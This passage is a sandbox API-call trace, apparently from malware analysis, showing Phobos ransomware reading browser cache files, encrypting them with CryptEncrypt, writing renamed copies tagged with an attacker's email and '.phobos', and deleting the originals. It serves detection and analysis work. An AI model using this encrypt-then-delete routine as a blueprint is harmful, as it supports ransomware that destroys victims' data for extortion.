dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0180.680] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0180.680] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0180.680] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0180.687] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32c28) returned 1 [0180.687] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0180.687] ReadFile (in: hFile=0xb8, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x43, lpOverlapped=0x0) returned 1 [0180.688] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0180.688] WriteFile (in: hFile=0x154, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x50, lpOverlapped=0x0) returned 1 [0180.689] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32aa8) returned 1 [0180.689] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0180.689] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0180.689] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0180.689] WriteFile (in: hFile=0x154, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0180.689] CryptDestroyKey (hKey=0xa32c28) returned 1 [0180.689] CloseHandle (hObject=0xb8) returned 1 [0180.689] CloseHandle (hObject=0x154) returned 1 [0180.690] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\desktop.ini")) returned 1 [0180.690] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0180.690] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\7962161087[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\7962161087[1].js"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0180.691] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=287230) returned 1 [0180.691] CloseHandle (hObject=0x154) returned 1 [0180.691] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\7962161087[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\7962161087[1].js")) returned 0x2020 [0180.691] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\7962161087[1].js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\7962161087[1].js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0180.691] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\7962161087[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\7962161087[1].js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0180.691] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0180.692] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0180.692] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\7962161087[1].js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\7962161087[1].js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0180.692] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32c28) returned 1 [0180.692] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0180.692] ReadFile (in: hFile=0x154, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x461fe, lpOverlapped=0x0) returned 1 [0180.860] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x46200, dwBufLen=0x46200 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x46200) returned 1 [0180.863] WriteFile (in: hFile=0xb8, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x46200, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x46200, lpOverlapped=0x0) returned 1 [0180.870] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ae8) returned 1 [0180.870] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0180.870] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0180.870] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0180.870] WriteFile (in: hFile=0xb8, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0180.871] CryptDestroyKey (hKey=0xa32c28) returned 1 [0180.871] CloseHandle (hObject=0x154) returned 1 [0180.871] CloseHandle (hObject=0xb8) returned 1 [0180.871] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\7962161087[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\7962161087[1].js")) returned 1 [0180.874] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0180.874] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AA61ILp[2].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aa61ilp[2].png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0180.875] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=516) returned 1 [0180.875] CloseHandle (hObject=0xb8) returned 1 [0180.875] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AA61ILp[2].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aa61ilp[2].png")) returned 0x2020 [0180.876] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AA61ILp[2].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aa61ilp[2].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0180.876] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AA61ILp[2].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aa61ilp[2].png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0180.876] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0180.876] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0180.876] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AA61ILp[2].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aa61ilp[2].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0180.876] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32c28) returned 1 [0180.876] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0180.877] ReadFile (in: hFile=0xb8, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x204, lpOverlapped=0x0) returned 1 [0180.984] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x210, dwBufLen=0x210 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x210) returned 1 [0180.984] WriteFile (in: hFile=0x154, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x210, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x210, lpOverlapped=0x0) returned 1 [0180.985] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ca8) returned 1 [0180.986] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0180.986] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0180.986] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0180.986] WriteFile (in: hFile=0x154, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0180.986] CryptDestroyKey (hKey=0xa32c28) returned 1 [0180.986] CloseHandle (hObject=0xb8) returned 1 [0180.989] CloseHandle (hObject=0x154) returned 1 [0180.989] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AA61ILp[2].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aa61ilp[2].png")) returned 1 [0180.990] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0180.990] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AAicW5W[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aaicw5w[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0180.991] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=13323) returned 1 [0180.991] CloseHandle (hObject=0x154) returned 1 [0180.991] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AAicW5W[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aaicw5w[1].jpg")) returned 0x2020 [0180.991] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AAicW5W[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aaicw5w[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0180.991] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AAicW5W[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aaicw5w[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0180.991] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0180.991] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0180.991] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AAicW5W[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aaicw5w[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0180.992] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32c28) returned 1 [0180.992] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0180.992] ReadFile (in: hFile=0x154, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x340b, lpOverlapped=0x0) returned 1 [0181.013] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x3410, dwBufLen=0x3410 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x3410) returned 1 [0181.013] WriteFile (in: hFile=0xb8, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x3410, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x3410, lpOverlapped=0x0) returned 1 [0181.015] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32c68) returned 1 [0181.015] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0181.015] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0181.015] CryptDestroyKey (hKey=0xa32c68) returned 1 [0181.016] WriteFile (in: hFile=0xb8, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0181.016] CryptDestroyKey (hKey=0xa32c28) returned 1 [0181.016] CloseHandle (hObject=0x154) returned 1 [0181.016] CloseHandle (hObject=0xb8) returned 1 [0181.020] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AAicW5W[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aaicw5w[1].jpg")) returned 1 [0181.021] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0181.021] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AAj0doQ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aaj0doq[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0181.023] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=6564) returned 1 [0181.023] CloseHandle (hObject=0xb8) returned 1 [0181.023] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AAj0doQ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aaj0doq[1].jpg")) returned 0x2020 [0181.023] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AAj0doQ[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aaj0doq[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0181.024] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AAj0doQ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aaj0doq[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0181.024] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0181.024] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0181.024] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AAj0doQ[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aaj0doq[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0181.027] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32c28) returned 1 [0181.027] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0181.027] ReadFile (in: hFile=0xb8, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x19a4, lpOverlapped=0x0) returned 1 [0181.073] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x19b0, dwBufLen=0x19b0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x19b0) returned 1 [0181.073] WriteFile (in: hFile=0x154, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x19b0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x19b0, lpOverlapped=0x0) returned 1 [0181.074] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d68) returned 1 [0181.074] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0181.074] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0181.074] CryptDestroyKey (hKey=0xa32d68) returned 1 [0181.074] WriteFile (in: hFile=0x154, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0181.075] CryptDestroyKey (hKey=0xa32c28) returned 1 [0181.075] CloseHandle (hObject=0xb8) returned 1 [0181.075] CloseHandle (hObject=0x154) returned 1 [0181.075] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AAj0doQ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aaj0doq[1].jpg")) 